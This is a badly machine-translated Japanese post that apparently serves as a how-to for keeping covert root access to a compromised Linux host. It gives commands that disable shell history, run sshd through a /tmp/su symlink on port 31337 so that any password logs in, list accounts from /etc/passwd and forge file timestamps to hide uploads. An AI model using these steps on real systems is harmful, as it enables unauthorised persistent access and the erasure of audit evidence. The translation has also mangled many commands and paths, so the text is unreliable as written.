我々はマシンを維持するために必要な多くの時間はいくつかのシーンは、ルートキット・レベルのバックドアを使用する必要はありませんでした、私たちはSSHのバックドアを使用しようとすることができ、運用、保守担当者を見つけるのは簡単である仕事にリバウンドシェルのタイミングに参加する許可を獲得しました
1.目的
長期メンテナンスマシンのroot権限、検出管理を回避する必要があるバックドアながら、
隠された通信は、隠し、隠しファイル、プロセス/モジュール隠された、隠されたレジストリ、隠されたサービス、隠されたポートなどの開始以来、
SSHコマンド消しゴム、着陸後の最初の実行
解除HISTFILE;輸出HISTFILESIZE = 0;輸出HISTIGNORE = *;輸出HISTCONTROL = ignorespace
各コマンド入力の前にスペースがもはや記録することができhistoryコマンドを入れて
2.バックドアの方法
LN -sfは/ usr / sbinに/ sshdの/ TMP / SU; / TMP / SU -oPort = 31337
3.任意のパスワードシステムを使用してバックドアを使用してください
SSHルート:[email protected] -p 31338
ユーザーが存在して4を参照してください
猫/ etc / passwdファイル| grepを-v nologinの|はgrep -v停止|はgrep -vシャットダウン| awkの-Fは、" :" ' {$ 4 "| |" $ 3 "" $ 1を印刷} 'より多くの|は
1つの #如下 2ルート| 0 | 0 3同期| 4 | 65534 4のMySQL | 104 | 109 5つのPostgres | 113 | 117 6 arpwatchの| 117 | 120 7のDebian-SNMP | 118 | 123 8音声ディスパッチャ| 127 | 29 9のDebian-GDM | 130 | 138
5.アップロードファイルのタイムスタンプを変更します。
-r古い新しいファイルのタイムスタンプファイルのタイムスタンプに触れます
6.終了のSSH
出口
注記
コア0.5は、任意のパスワード認証十分pam_rootok.so限り、成功しCHSH以外がSUのためのPAM設定ファイルを使用することができ、実際のショーの任意のSSHパスワードにこの設定が含まれているPAM設定ファイル、chfnコマンドである
1.前提でlinuxソフト接続のSSH SSH構成は、バックドアを可能にPAM認証を使用する必要があります
。2.非難ホストをrootログインを許可していない、他の既存のユーザーのログインを使用します